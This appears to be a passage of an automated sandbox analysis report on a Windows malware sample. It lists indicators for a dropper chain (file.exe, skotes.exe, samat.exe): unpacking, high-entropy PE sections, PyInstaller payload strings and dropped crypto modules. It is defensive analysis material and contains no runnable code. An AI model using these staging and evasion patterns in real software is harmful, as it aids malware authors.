Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 1927680 > 1048576

Source: file.exe

Static PE information: Raw size of fjmpujlc is bigger than: 0x100000 < 0x1a4c00

Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4574676544.00007FF8B8327000.00000002.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb** source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: samat.exe, 00000008.00000002.4568570169.00007FF8A8792000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb!! source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585287094.00007FF8B9843000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: samat.exe, 00000008.00000002.4587381995.00007FF8BFAC3000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585606922.00007FF8B9F66000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: samat.exe, 00000008.00000002.4583959875.00007FF8B9162000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585930207.00007FF8B9F73000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586952230.00007FF8BA51D000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584962997.00007FF8B93C9000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: samat.exe, 00000008.00000002.4582141897.00007FF8B90FF000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: samat.exe, 00000008.00000002.4582488584.00007FF8B911E000.00000002.00000001.01000000.00000018.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.6c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.7a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.7a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW;

Source: VCRUNTIME140.dll.7.dr

Static PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Code function: 8_2_00007FF8B7E8DE80 GetModuleHandleW,LoadLibraryW,GetProcAddress,AddAccessAllowedAce,GetProcAddress,AddAccessDeniedAce,GetProcAddress,AddAccessAllowedAceEx,GetProcAddress,AddMandatoryAce,GetProcAddress,AddAccessAllowedObjectAce,GetProcAddress,AddAccessDeniedAceEx,GetProcAddress,AddAccessDeniedObjectAce,GetProcAddress,AddAuditAccessAceEx,GetProcAddress,AddAuditAccessObjectAce,GetProcAddress,SetSecurityDescriptorControl,InitializeCriticalSection,TlsAlloc,DeleteCriticalSection,TlsFree,

8_2_00007FF8B7E8DE80

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: _ghash_clmul.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xac61
Source: _pkcs1_decode.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x10c34
Source: _raw_eksblowfish.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xca96
Source: _chacha20.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x351a
Source: _SHA384.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x1655d
Source: _raw_cast.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xc443
Source: md.cp313-win_amd64.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x47a9
Source: _modexp.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x172cd
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x1da666 should be: 0x1e3c3d
Source: _SHA256.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x6eb8
Source: _cffi_backend.cp313-win_amd64.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x2f4d9
Source: _raw_ecb.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x4671
Source: _BLAKE2s.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x5f6b
Source: _cpuid_c.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xdccc
Source: _SHA1.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xf079
Source: _SHA224.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x1037a
Source: _MD2.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xeba3
Source: _scrypt.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x4714
Source: _raw_des3.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x1d746
Source: _RIPEMD160.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x69e1
Source: _raw_ctr.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xdcf9
Source: _ec_ws.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xbf2b1
Source: pywintypes313.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0x21b11
Source: _keccak.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xdc9d
Source: file.exe	Static PE information: real checksum: 0x1da666 should be: 0x1e3c3d
Source: _Salsa20.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xb9f9
Source: _raw_arc2.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x13220
Source: _curve448.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x1a70d
Source: _ARC4.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x9b3a
Source: _raw_aes.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xbec9
Source: _MD4.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x9e2d
Source: _strxor.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x48ff
Source: _ghash_portable.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xe5b7
Source: _raw_cfb.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xed0d
Source: md__mypyc.cp313-win_amd64.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x1ee46
Source: _curve25519.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x1023e
Source: _poly1305.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xbf54
Source: _ed25519.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x10701
Source: _BLAKE2b.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x120c3
Source: _SHA512.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xdf25
Source: _MD5.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xa544
Source: _raw_aesni.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x646e
Source: win32crypt.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x22ce5
Source: _ed448.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x1eae6
Source: _raw_des.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x13f62
Source: _raw_ofb.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x10ea2
Source: _raw_blowfish.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xe4b7
Source: _raw_ocb.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x11289
Source: _raw_cbc.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x5ba2

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: fjmpujlc
Source: file.exe	Static PE information: section name: jlhbczjq
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: fjmpujlc
Source: skotes.exe.0.dr	Static PE information: section name: jlhbczjq
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: VCRUNTIME140.dll.7.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.7.dr	Static PE information: section name: _RDATA
Source: libcrypto-3.dll.7.dr	Static PE information: section name: .00cfg
Source: libssl-3.dll.7.dr	Static PE information: section name: .00cfg
Source: python313.dll.7.dr	Static PE information: section name: PyRuntim

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B802267D push rbx; retf		8_2_00007FF8B8022685
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B80227AE push rsp; iretd		8_2_00007FF8B80227B9

Source: file.exe	Static PE information: section name: entropy: 7.982732781787212
Source: file.exe	Static PE information: section name: fjmpujlc entropy: 7.954406052797792
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.982732781787212
Source: skotes.exe.0.dr	Static PE information: section name: fjmpujlc entropy: 7.954406052797792

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Process created: "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve448.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\samat[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
